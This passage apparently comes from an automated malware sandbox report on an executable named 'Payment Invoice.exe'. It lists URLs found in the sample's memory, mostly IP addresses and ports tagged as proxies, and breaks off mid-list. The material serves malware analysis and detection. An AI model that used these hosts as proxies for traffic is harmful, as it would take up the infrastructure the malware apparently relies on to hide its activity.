                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.183.82.221:8197://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.213.76.24
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.213.76.24://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.213.76.24:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.29.174.242:10800
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://175.29.174.242:10800://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.103.51.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.103.51.24:30421
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.103.51.24:30421://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.102:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.102:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.99:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.73.99:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.115.79.195:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.115.79.195:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.118.52.129:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.118.52.129:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.119.227.65:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.119.227.65:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.34:5020
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.192.65.34:5020://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.194.189.40
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.194.189.40://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.194.189.40:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.144.158:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.197.144.158:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.213.141.107:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.213.141.107:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.241.143.197:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.241.143.197:80800q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318473000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.241.143.197:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25/
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.253.53.25:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.96.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.96.11:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.58.96.11:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318678000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.8.230.197:8187
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.8.230.197:8187://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.88.166.218:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.88.166.218:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E86000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.81.85:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.98.81.85:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.99.2.43:1081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.99.2.43:1081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.104.16.118:14880
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.104.16.118:14880://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.161.223:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.161.223:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.206
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.206.40:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.206.40:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.89.10:8090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.125.89.10:8090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.212.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.128.212.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.208:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.208:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.211:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.131.29.211:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.153.33.94
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.153.33.94://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.153.33.94:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C54000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.159.120.74:58080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.159.120.74:58080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210.50:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.229.210.50:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.231.245.182:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.231.245.182:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.157:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.157:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.158:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.158:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AB4000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.226:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.234.194.226:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.224:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.5.224:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.83.242:3177
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.38.83.242:3177://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.41:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.55.247.41:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.69.118.177:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.69.118.177:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.82.47:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.72.82.47:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.86.64.1:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.86.64.1:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.86.64.1:3629H
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.91.76.34:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.91.76.34:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.156:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.45.156:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.78.9:26316
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://177.93.78.9:26316://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.230.243:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.230.243:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.253.35:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.115.253.35:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.148.69:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.148.69:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.156.219:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.156.219:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172.154:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.172.154:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.200.87:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.207.96:18877
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.207.96:18877://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:33225
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.128.82.105:33225://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.141.249.246:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.141.249.246:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.166.161:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.166.161:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.197.147:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.158.197.147:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.80:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.48.80:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.51.79:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.51.79:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.212.51.79:5678P
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.23.192.249:8901
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.23.192.249:8901://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.122.164:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.122.164:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318314000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.53:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631828A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.236.246.53:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.245.145.234:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.245.145.234:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.251.111.18:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.251.111.18:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.251.111.27:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.253.201.11:9125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.253.201.11:9125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.18.11:57335
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.254.18.11:57335://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:1951
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.33.163.156:1951://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.54.21.203:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.54.21.203:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.65.171.6:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://178.65.171.6:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.133.33:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.133.33:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631982C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319973000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.17:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.17:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.27:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.192.27:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.109.193.228:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.109.193.228:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317190000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.125.51.54:27234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.125.51.54:27234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.16:8088
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.16:8088://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.93.198:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.93.198:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.94.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.94.238:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.94.238:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.48.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.48.80.9:8085
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.48.80.9:8085://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.49.160.32:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163186A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.49.160.32:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.219.63:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.219.63:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.240.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.240.69:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.60.240.69:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.134.236.231:3128
